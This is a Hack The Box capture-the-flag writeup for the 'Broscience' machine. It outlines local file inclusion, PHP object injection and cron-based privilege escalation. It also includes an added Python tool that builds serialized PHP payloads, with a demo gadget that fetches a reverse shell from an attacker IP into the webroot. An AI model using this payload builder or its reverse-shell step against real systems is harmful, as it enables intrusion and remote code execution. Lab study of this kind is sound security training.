Hack The Box - Broscience [Medium] - 20/08/2023
HTB Writeup
Short Overview
The video consists of my enumeration process and the overall hacking of the machine; please use this as a walkthrough.
This box consists of several vulnerabilities:

- Local File Inclusion / Path traversal - The `path=` query string parameter in the `img.php` file is vulnerable to this; with it we can download the site map that I discovered using Burp.
- Deserialization / PHP Object Injection - I saw this in the `utils.php` file, and I prepared a payload for the `AvatarInterface` class, since this is the class that uses magic methods, and it has the `file_get_contents` function that we are going to use to pull the PHP reverse shell.
- Linux Privilege Escalation - By pure luck, I noticed the `renew_cert.sh` script in the `/opt/` folder, and I immediately noted that this must be the vector to leverage for privilege escalation. A much better way to figure this out is the pspy tool, which would have shown me this command being run as root: `timeout 10 /bin/bash -c /opt/renew_cert.sh /home/bill/Certs/broscience.crt`

I did look up some hints; thanks to gatogamer1155 and his writeup for this machine.
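The object-injection step above relies on PHP's serialize() text format, which unserialize() reads back byte for byte before firing the class's magic methods. The Python helper below is an added example, not code from the original writeup or from the box; it builds that format and URL-encodes it for delivery. The property names, the attacker URL and the transport method in it are assumptions, since the writeup names only the `AvatarInterface` class and its `file_get_contents` call.

```python
"""Build PHP serialize() output for a PHP Object Injection payload.

Added example for this writeup, not code from the box or its author.
A vulnerable unserialize() call reconstructs whatever object this text
describes and then runs its magic methods (__wakeup, __destruct, ...), so
the payload has to be byte-exact: every s:N: length is a byte count.
Class property names in demo_payload() are hypothetical placeholders (the
writeup names the class AvatarInterface but not its properties), and the
transport (a URL-encoded GET/POST/cookie value) is assumed as well.
"""
from dataclasses import dataclass, field
from typing import Any, Dict
from urllib.parse import quote


@dataclass
class PhpObject:
    """A PHP object to serialize: class name plus public properties, in order."""
    cls: str
    props: Dict[str, Any] = field(default_factory=dict)


def php_serialize(value: Any) -> str:
    """Serialize a Python value into the exact text PHP's serialize() emits."""
    if value is None:
        return "N;"
    if isinstance(value, bool):  # bool before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        # PHP counts bytes, not characters; len(value) would be wrong for non-ASCII
        nbytes = len(value.encode("utf-8"))
        return f's:{nbytes}:"{value}";'
    if isinstance(value, (list, tuple)):
        body = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        nbytes = len(value.cls.encode("utf-8"))
        return f'O:{nbytes}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"cannot serialize {type(value).__name__}")


def build_payload_param(obj: PhpObject) -> str:
    """URL-encode the serialized object so it survives as a query/cookie value.

    safe="" makes quote() encode '/' too, so the braces, quotes, colons and
    semicolons of the PHP format reach unserialize() intact.
    """
    return quote(php_serialize(obj), safe="")


def demo_payload() -> PhpObject:
    """Hypothetical gadget: an object whose magic method fetches a remote file and writes it locally.

    'source' and 'destination' are placeholder property names, not the box's real ones;
    only the shape (file_get_contents pulls a PHP reverse shell) comes from the writeup.
    """
    return PhpObject("AvatarInterface", {
        "source": "http://10.10.14.5:8000/shell.php",  # attacker-hosted reverse shell (assumed)
        "destination": "./shell.php",                  # written inside the webroot (assumed)
    })


if __name__ == "__main__":
    print(php_serialize(demo_payload()))
    print(build_payload_param(demo_payload()))
```

Check the generated string against `php -r 'var_dump(unserialize($argv[1]));'` before sending it: a single off-by-one in an `s:N:` length makes unserialize() return false and the gadget never runs.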